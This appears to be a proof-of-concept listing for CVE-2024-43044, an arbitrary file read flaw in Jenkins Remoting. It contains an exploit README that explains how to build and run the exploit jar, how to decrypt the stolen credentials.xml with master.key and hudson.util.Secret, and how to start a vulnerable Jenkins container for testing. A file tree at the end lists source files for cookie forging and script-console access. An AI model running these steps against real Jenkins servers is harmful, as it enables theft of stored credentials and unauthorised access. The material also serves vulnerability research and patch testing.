CVE-2024-43044 PoC — Jenkins Security Vulnerability

Associated Vulnerability
Title: Jenkins Security Vulnerability (CVE-2024-43044)
Description: Jenkins 2.470 and earlier, LTS 2.452.3 and earlier allows agent processes to read arbitrary files from the Jenkins controller file system by using the `ClassLoaderProxy#fetchJar` method in the Remoting library.
Readme
## Intro
This is an exploit for CVE-2024-43044, an arbitrary file read vulnerability that allows an agent to fetch files from the controller.

The exploit uses the vulnerability to read the `credentials.xml` file and obtain the secret keys needed to decrypt it.

Initial code: https://github.com/convisolabs/CVE-2024-43044-jenkins
Original writeup: https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/

## Building the exploit
```sh
mvn package
```

## Running the exploit

```sh
java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>
```

### Decrypt credentials.xml
```sh
docker run \
  --rm \
  --network none \
  --workdir / \
  --mount "type=bind,src=$PWD/master.key,dst=/master.key" \
  --mount "type=bind,src=$PWD/hudson.util.Secret,dst=/hudson.util.Secret" \
  --mount "type=bind,src=$PWD/credentials.xml,dst=/credentials.xml" \
  docker.io/hoto/jenkins-credentials-decryptor:latest \
  /jenkins-credentials-decryptor \
    -m master.key \
    -s hudson.util.Secret \
    -c credentials.xml \
    -o json
```

## Testing 

You can test it against a vulnerable version using Docker:

```sh
docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17
```

Once you have a Jenkins instance running, set up an agent.
File Snapshot

```
[4.0K] /data/pocs/f743f38a3b1bef93d94a98fb69cf4dd8014718dd
├── [4.0K] assets
│   └── [2.9M] rce_mode_secret.gif
├── [3.2K] pom.xml
├── [1.2K] README.md
└── [4.0K] src
    └── [4.0K] main
        └── [4.0K] java
            └── [4.0K] poc
                ├── [6.6K] CookieForger.java
                ├── [4.1K] FakeCookieForger.java
                ├── [5.6K] Main.java
                ├── [8.3K] PocListener.java
                ├── [1.2K] RemoteFileReader.java
                ├── [6.3K] ScriptConsole.java
                ├── [5.2K] SystemUtils.java
                ├── [ 516] UserInfo.java
                └── [4.3K] UserParser.java

5 directories, 12 files
```